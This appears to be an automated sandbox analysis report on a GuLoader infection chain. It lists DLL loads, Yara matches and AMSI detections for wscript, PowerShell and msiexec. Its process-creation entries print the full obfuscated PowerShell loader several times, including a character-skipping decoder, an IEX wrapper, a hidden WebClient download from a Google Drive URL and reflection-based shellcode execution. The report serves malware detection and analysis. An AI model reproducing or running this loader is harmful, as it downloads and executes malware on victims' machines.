              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ystem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb.hz source: powershell.exe, 00000009.00000002.1547484456.0000013AE7139000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbh source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000009.00000002.1547484456.0000013AE711C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($N", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000C.00000002.1963956226.000000000C5F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1963821003.0000000008110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1949177684.00000000054D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Mackle)$GlOBaL:SYnCopatEs = [SYSTem.teXt.encODIng]::asCii.getsTring($solCremeRS)$glObAl:BogdaGen=$SYNCOPaTEs.subsTriNG($AROidEouS208,$eNeBoERS)<#Preteressential Versifikationers Maxi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Llingemors $Unexcitableness $Preambitiously), (Sjettes81 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Creda = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Splatterer)), $Feltbeskrivelsers).DefineDynamicModule($Myldretids, $false).DefineType($Desks183, $Terlinguaite, [System.MulticastDeleg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Mackle)$GlOBaL:SYnCopatEs = [SYSTem.teXt.encODIng]::asCii.getsTring($solCremeRS)$glObAl:BogdaGen=$SYNCOPaTEs.subsTriNG($AROidEouS208,$eNeBoERS)<#Preteressential Versifikationers Maxi
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le OeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B255205 push eax; ret 9_2_00007FF88B255251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B250942 push E95B70D0h; ret 9_2_00007FF88B2509C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B323452 pushfd ; ret 9_2_00007FF88B323453
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06EBCF5C push eax; iretd 12_2_06EBCF5D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_088404CD pushfd ; retf 12_2_088404CE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_088466E7 push FFFFFFE2h; retf 12_2_088466EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_088438F5 push eax; iretd 12_2_088438F7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08844E16 push edi; ret 12_2_08844E22
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0884424D push ebx; ret 12_2_088442B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0884164A push eax; ret 12_2_0884164B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08846253 pushfd ; ret 12_2_08846256
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08845B8C push esi; ret 12_2_08845B97
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08843708 push eax; retf 12_2_08843709
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08844116 push ebx; ret 12_2_088442B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08845B75 push ecx; retf 12_2_08845B76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03935B8C push esi; ret 16_2_03935B97
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03934116 push ebx; ret 16_2_039342B2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03933708 push eax; retf 16_2_03933709
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03935B75 push ecx; retf 16_2_03935B76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_039304CD pushfd ; retf 16_2_039304CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_039338F5 push eax; iretd 16_2_039338F7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_039366E7 push FFFFFFE2h; retf 16_2_039366EA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03934E16 push edi; ret 16_2_03934E22
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03936253 pushfd ; ret 16_2_03936256
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0393164A push eax; ret 16_2_0393164B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0393424D push ebx; ret 16_2_039342B2
